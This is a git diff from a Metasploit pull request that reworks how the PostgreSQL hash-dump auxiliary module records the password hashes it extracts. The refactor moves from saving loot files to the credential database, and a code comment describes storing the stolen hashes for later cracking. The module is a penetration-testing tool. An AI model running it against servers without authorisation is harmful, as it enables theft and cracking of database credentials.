Merge pull request #40 from rapid7/feature/MSP-9748/postgres_hashdump
Feature/msp 9748/postgres hashdumpbug/bundler_fix
commit
4bc543715d
|
@ -53,12 +53,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
print_status("Query appears to have run successfully")
|
||||
end
|
||||
|
||||
this_service = report_service(
|
||||
:host => datastore['RHOST'],
|
||||
:port => datastore['RPORT'],
|
||||
:name => 'postgres',
|
||||
:proto => 'tcp'
|
||||
)
|
||||
|
||||
tbl = Rex::Ui::Text::Table.new(
|
||||
'Header' => 'Postgres Server Hashes',
|
||||
|
@ -66,6 +60,22 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'Columns' => ['Username', 'Hash']
|
||||
)
|
||||
|
||||
service_data = {
|
||||
address: ::Rex::Socket.getaddress(rhost,true),
|
||||
port: rport,
|
||||
service_name: 'postgres',
|
||||
protocol: 'tcp',
|
||||
workspace_id: myworkspace_id
|
||||
}
|
||||
|
||||
credential_data = {
|
||||
origin_type: :service,
|
||||
jtr_format: 'raw-md5',
|
||||
module_fullname: self.fullname,
|
||||
private_type: :nonreplayable_hash
|
||||
}
|
||||
|
||||
credential_data.merge!(service_data)
|
||||
|
||||
|
||||
res[:complete].rows.each do |row|
|
||||
|
@ -73,23 +83,24 @@ class Metasploit3 < Msf::Auxiliary
|
|||
next if row[0].empty? or row[1].empty?
|
||||
password = row[1]
|
||||
password.slice!(0,3)
|
||||
|
||||
credential_data[:username] = row[0]
|
||||
credential_data[:private_data] = password
|
||||
|
||||
credential_core = create_credential(credential_data)
|
||||
login_data = {
|
||||
core: credential_core,
|
||||
status: Metasploit::Credential::Login::Status::UNTRIED
|
||||
}
|
||||
login_data.merge!(service_data)
|
||||
create_credential_login(login_data)
|
||||
|
||||
tbl << [row[0], password]
|
||||
end
|
||||
print_good("#{tbl.to_s}")
|
||||
report_hash(tbl.to_csv,this_service)
|
||||
|
||||
|
||||
end
|
||||
|
||||
#Reports the Stolen Hashes back to the Database for later cracking
|
||||
def report_hash(hashtable,service)
|
||||
filename= "#{datastore['RHOST']}-#{datastore['RPORT']}_postgreshashes.txt"
|
||||
path = store_loot("postgres.hashes", "text/plain", datastore['RHOST'], hashtable, filename, "Postgres Hashes",service)
|
||||
print_status("Hash Table has been saved: #{path}")
|
||||
|
||||
end
|
||||
|
||||
|
||||
|
||||
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue